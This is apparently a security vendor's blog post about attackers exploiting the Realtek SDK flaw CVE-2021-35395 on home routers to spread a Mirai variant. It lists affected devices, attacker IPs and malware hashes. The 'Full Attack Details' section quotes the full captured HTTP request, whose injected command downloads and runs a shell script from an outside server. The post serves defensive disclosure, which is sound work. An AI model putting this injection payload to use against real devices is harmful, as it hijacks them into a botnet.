On August 16th, three days ago, multiple vulnerabilities in a software SDK distributed as part of Realtek chipsets were disclosed by IoT Inspector Research Lab [1]. The vulnerabilities allow attackers to fully compromise and take control of affected devices. Just yesterday, only two days after the publication, our home security solution, Secure Home, detected attempts to exploit these vulnerabilities to spread a variant of a Mirai malware.

One of the vulnerabilities disclosed, CVE-2021-35395 [2], affects the web interface that is part of the SDK, and is a collection of 6 different vulnerabilities. As of August 18th, we have identified attempts to exploit CVE-2021-35395 in the wild.

Specifically, we noticed exploit attempts to “formWsc” and “formSysCmd” web pages. The exploit attempts to deploy a Mirai variant detected in March by Palo Alto Networks [3]. Mirai is a notorious IoT and router malware circulating in various forms for the last 5 years. It was originally used to shut down large swaths of the internet but has since evolved into many variants for different purposes [4].

Same attacker – different incidents

A similar incident was reported two weeks ago, on August 6th, by Juniper Networks [5]. A newly discovered vulnerability was then exploited in the wild only 2 days after publication to spread the same Mirai variant.

The webserver serving the Mirai botnet uses the same network subnet, indicating that the same attacker is involved in both incidents.

This chain of events shows that hackers are actively looking for command injection vulnerabilities and use them to propagate widely used malware quickly. These kinds of vulnerabilities are easy to exploit and can be integrated quickly into existing hacking frameworks that attackers employ, well before devices are patched and security vendors can react.

SAM’s security research group tracks published exploits and quickly blocks them using IoT virtual patching (read our recent article to learn more). The above vulnerabilities were blocked within a day of publication, protecting any potentially vulnerable device.

Affected devices

According to the original research, the vulnerable Realtek SDK is used by more than 65 vendors on more than 200 devices. According to SAM’s own research of connected devices, based on anonymously collected network data spanning more than 2M home and business networks, the following devices are the most common devices with the Realtek SDK:

  • Netis E1+ extender
  • Edimax N150 and N300 Wi-Fi router
  • Repotec RP-WR5444 router

These devices are used mainly to enhance Wi-Fi reception.

Full Attack Details

The attack originated from 31.210.20[.]100. However, we believe that attacker’s IP addresses will change over time.

The full attack payload:

POST /goform/formWsc HTTP/1.1

Connection: close

Content-Type: application/x-www-form-urlencoded

User-Agent: Dark

submit-url=%2Fwlwps.asp&resetUnCfg=0&peerPin=12345678;cd /tmp; wget http://212.192.241.87/lolol.sh; curl -O http://212.192.241.87/lolol.sh; chmod 777 lolol.sh; sh lolol.sh;&setPIN=Start+PIN&configVxd=off&resetRptUnCfg=0&peerRptPin=


IOCs

IP addresses – 31.210.20[.]100, 212.192.241[.]87

Files

Filename Hash (sha256)
dark.x86 a3ee4bd2f330bf6939cb9121f36261e42f54ffc45676120216fd8da4cb52036a
dark.mips 9dfaa2e60027427c9f1ff377ad3cd3bc800b914c4b9ea5e408442d25f475dab9
dark.mpsl 24d6cd113c9ddf49cb6140d2cc185f2cc033170ac27e2c352d94848cc449c312
dark.arm4 caa8b10057fb699d463f309913d0557462e8b37afdaf4d0c3cff63f9b9605f0d
dark.arm5 fd7da924fe743d2e09b10f4e8a01230f7bc884ae14ef0e6133e553de118a457e
dark.arm6 0c734c8c0f8e575a08672d01fc5a729605b3e9dbb4d0c62bd94ad86d2c3d6aeb
dark.arm7 85b07054472bbaa06d0611dfb28632ffa351d3b13e37b447914f49a1dfe07dc4
dark.ppc a5478d51a809aed51d633611371c105e3ec82490f9516d186e7013dabcf8c77f
dark.m68k bf9d92666d3b25cf6e49234472a2fa515107eb6df07f4aee6deb6a42eed4fa92
dark.sh4 16787be5e8d7de5816d590efb4916c7415f458bc7059d2d287715fb3ef8e0783
dark.86_64 67a655d4360cfe0ca5db17c6486f3dfbca1c82c2af4bc1f2019cee68199108c7

———————————————————————————————————————————————-

Sources

[1] www.iot-inspector.com/blog/advisory-multiple-issues-realtek-sdk-iot-supply-chain/

[2] nvd.nist.gov/vuln/detail/CVE-2021-35395

[3] unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/

[4] en.wikipedia.org/wiki/2016_Dyn_cyberattack

[5] blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild

We’d love to hear from you.
Looking for more information about IoT & network security?

get in touch